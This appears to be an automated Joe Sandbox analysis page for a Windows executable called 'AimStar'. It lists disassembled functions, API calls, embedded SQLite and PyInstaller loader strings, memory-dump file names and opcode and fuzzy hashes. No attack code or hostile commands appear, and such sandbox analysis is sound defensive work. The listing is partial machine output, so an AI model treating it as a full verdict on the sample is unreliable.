String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 2830847230-200680935
Opcode ID: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
Instruction ID: dd1aed7914c01dbf34e98dc4e86f1908639aef00dfb1540b7d28f5d820dd252b
Opcode Fuzzy Hash: fd0e222e7faf09e0b063a0f2a82046eceadd766e45b64b1c38adeb6e4bde358b
Instruction Fuzzy Hash: E6E1CB32B4BB82A5EB659B15E1447B9A3A5FB80BC8F044035CE8D07B99DF3CE541C368

Function 00007FF710F42180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF710F421AB
SelectObject.GDI32 ref: 00007FF710F421F2
DrawTextW.USER32 ref: 00007FF710F42215
SelectObject.GDI32 ref: 00007FF710F4222B
ReleaseDC.USER32 ref: 00007FF710F4223B
MoveWindow.USER32 ref: 00007FF710F4228B
MoveWindow.USER32 ref: 00007FF710F422CB
MoveWindow.USER32 ref: 00007FF710F4231E
MoveWindow.USER32 ref: 00007FF710F42366

Strings

P%, xrefs: 00007FF710F421FF

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b7eca231638e3e1f5ba7d381d938b4126c3882f35701ec47ed7984308b3d99ef
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 5351E836608BA186D6249F26A4181BAF7A1F798B61F404131EFDE83795DF3CE089D720

Function 00007FF710F480B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF710F480EF
GetWindowLongPtrW.USER32 ref: 00007FF710F4816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF710F48182
GetLastError.KERNEL32 ref: 00007FF710F4818C
SetWindowLongPtrW.USER32 ref: 00007FF710F481A3

Strings

Needs to remove its temporary files., xrefs: 00007FF710F48175

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 271f43225315fbb57902a094c190d750cbadc835227f0e016bd32e2443c5b9d7
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 5C21AB35B0CE4681E7416B7AA856579A358EF88BB0F884131DE2D833D5DE2CF5DAC320

Function 00007FF8A8152940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8A8152968
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF8A81529BA
_RTC_Initialize.LIBCMT ref: 00007FF8A81529E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF8A8152A0E
__scrt_release_startup_lock.LIBCMT ref: 00007FF8A8152A39

Memory Dump Source

Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true

Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction ID: 7fe109d555f43d2dc55cd6c1f509fc5236de704c0e8658cf71ad0e9a74aa9558
Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction Fuzzy Hash: 4781E122E0E243B6FA6F9B65A4402796390EF867C0F486135E90C437A6DF7CE945C338

Function 00007FF710F56300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F56343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F56730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F569CC

Strings

p, xrefs: 00007FF710F5646D
:, xrefs: 00007FF710F564FC
f, xrefs: 00007FF710F56465
p, xrefs: 00007FF710F563F5
-, xrefs: 00007FF710F563D9

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: b5ba3284893052e7ff98e22cb206361e043a0247dd3356c3e385f86d6f71e249
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 5A127066A0C94386FB207A14B156279B6B9FB48764FC44135E6A947BC4DF3CF688CB20

Function 00007FF710F51038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F51078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F51440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F516DF

Strings

f, xrefs: 00007FF710F51110
p, xrefs: 00007FF710F5111D
f, xrefs: 00007FF710F512C5
f, xrefs: 00007FF710F5117A
p, xrefs: 00007FF710F51182

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 8fcf5eb3ddbe455194ae058d66137542549d630644bbf7affd90912af0b487e5
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: AF12C322E0C94386FB20BA55E05667AF679FB40764FC84135E69947BC4DB7CF688CB20

Function 00007FF8A87B2100 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87B219A

Strings

temporary table name must be unqualified, xrefs: 00007FF8A87B21CE
%s %T already exists, xrefs: 00007FF8A87B233D
sqlite_temp_master, xrefs: 00007FF8A87B2159, 00007FF8A87B225D
table, xrefs: 00007FF8A87B2235
view, xrefs: 00007FF8A87B222E, 00007FF8A87B2344
there is already an index named %s, xrefs: 00007FF8A87B23AE
sqlite_master, xrefs: 00007FF8A87B211F, 00007FF8A87B2282, 00007FF8A87B25D4

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 2830847230-2846519077
Opcode ID: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
Instruction ID: 5b43578b9e8744f82edb6174933a4d531302a9e4edca64802b9d87f58cd485e5
Opcode Fuzzy Hash: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
Instruction Fuzzy Hash: 4D02D071A5A782AAEB14DF2194047B937A2FB85FC4F044235DE4E07795DF3CE9418728

Function 00007FF8A8760A40 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FF8A8760B57

Strings

winFullPathname2, xrefs: 00007FF8A8760BC5
\, xrefs: 00007FF8A8760AC8
:, xrefs: 00007FF8A8760A71
:, xrefs: 00007FF8A8760AAC
?, xrefs: 00007FF8A8760A81
winFullPathname1, xrefs: 00007FF8A8760B3C
%s%c%s, xrefs: 00007FF8A8760AB6

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
Instruction ID: 06e1857e9ded0d46aa837f112785f6dd9435810e2342a06deb213a1e8d0bfe5f
Opcode Fuzzy Hash: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
Instruction Fuzzy Hash: 7351F521F8E38365FB199F65A8156BA6B91EF44BC8F484036DD4E13682DF3CE8458728

Function 00007FF710F41050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF710F41108
Failed to extract %s: failed to open archive file!, xrefs: 00007FF710F41098
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF710F410CC
fread, xrefs: 00007FF710F411FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF710F411F6
malloc, xrefs: 00007FF710F4110F
fseek, xrefs: 00007FF710F410D3

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
Instruction ID: 08dcf96e05720c10e5db8cf28e69652d89cfcbe5d6b1e84d60c8090fcd684549
Opcode Fuzzy Hash: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
Instruction Fuzzy Hash: E6414025B0CA5241EA10FB15A8029B9E3ACBF84BE4FD44532EE0D47795DE3CF549C760

Function 00007FF710F48850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF710F43CBB), ref: 00007FF710F488F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF710F43CBB), ref: 00007FF710F488FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF710F43CBB), ref: 00007FF710F4893C

Part of subcall function 00007FF710F48A20: GetEnvironmentVariableW.KERNEL32(00007FF710F4388E), ref: 00007FF710F48A57
Part of subcall function 00007FF710F48A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF710F48A79

Part of subcall function 00007FF710F582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F582C1

Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA

Strings

TMP, xrefs: 00007FF710F488B2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF710F488CC
TMP, xrefs: 00007FF710F4888C, 00007FF710F48993
_MEI%d, xrefs: 00007FF710F48902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF710F4896E

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction ID: 91674fd2d4983c8932960ca1ba99b02b7a0d00544424844afb52f5cdf313c4c3
Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction Fuzzy Hash: B0418021B1DE4250EA10BB26A8576BD93A8AF85BA4FC44031ED0D877D6DE3CF54EC320

Function 00007FF8A8762CF0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87630AA

Strings

API called with NULL prepared statement, xrefs: 00007FF8A8762E54
API called with finalized prepared statement, xrefs: 00007FF8A8762E6C, 00007FF8A8762EE8
ATTACH x AS %Q, xrefs: 00007FF8A8762D80
misuse, xrefs: 00007FF8A8762E99, 00007FF8A8762F06
%s at line %d of [%.10s], xrefs: 00007FF8A8762EA5, 00007FF8A8762F12
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8762D63, 00007FF8A8762EF9

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 2830847230-1404302391
Opcode ID: 5b54c79fbf9ef4df439d182e0c10d0aaa222cde74f4ab4cd2ef5e3f45b57d46a
Instruction ID: a22525a1263852934862ddda06361f238b11d05396f876c3c66042fa177f7184
Opcode Fuzzy Hash: 5b54c79fbf9ef4df439d182e0c10d0aaa222cde74f4ab4cd2ef5e3f45b57d46a
Instruction Fuzzy Hash: DAF17C21B4FB86A6EAA49B65A45437973A5FF80BC0F144135CA5E077A5CF3CE845C328

Function 00007FF710F4EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF710F4EAD5

Part of subcall function 00007FF710F4FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF710F4FA6F
Part of subcall function 00007FF710F4FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF710F4FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF710F4EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF710F4EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF710F4EF08

Strings

csm, xrefs: 00007FF710F4EB56
csm, xrefs: 00007FF710F4EAEF
csm, xrefs: 00007FF710F4EBD0

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: ba9606a0720221f5dedbac9e2a35ca0a34bbd462ca31193e3ed612490fa84e28
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: EED18032A0CF4186EB20AF6594427ADB7A8FB557A8F900135EE4D97B95DF38F188C710

Function 00007FF710F5ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF710F5F11A,?,?,000002020A699808,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF710F5F11A,?,?,000002020A699808,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EF08

Strings

api-ms-, xrefs: 00007FF710F5EE46
ext-ms-, xrefs: 00007FF710F5EE59

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 3f9b8ab6d8581fe41d81464aef735dad918fc7068acf2bfcec1b14185e2e4dff
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 7C41E521B2DE0242EA19EF169806675A3A9BF49BB0FC98535ED1D87784DE3CF54DC320

Function 00007FF710F42C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
MessageBoxW.USER32 ref: 00007FF710F42D99

Strings

%ls: , xrefs: 00007FF710F42D22
Error, xrefs: 00007FF710F42D8C
<FormatMessageW failed.>, xrefs: 00007FF710F42D70
[PYI-%d:ERROR] , xrefs: 00007FF710F42CA6

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 216ef6fa3523ed6eff54554195cb6d0f90483de71eba51f70b48dfb83722ca6f
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 5231E936B0CE4142E620BB15A8056AAB7A9BF847E8F810135EF4D93759DF3CE54EC310

Function 00007FF8A8788FF0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FF8A87CD120), ref: 00007FF8A878918D

Strings

API called with NULL prepared statement, xrefs: 00007FF8A8789004
API called with finalized prepared statement, xrefs: 00007FF8A878901C
misuse, xrefs: 00007FF8A8789047
%s at line %d of [%.10s], xrefs: 00007FF8A8789053
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A878903A

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
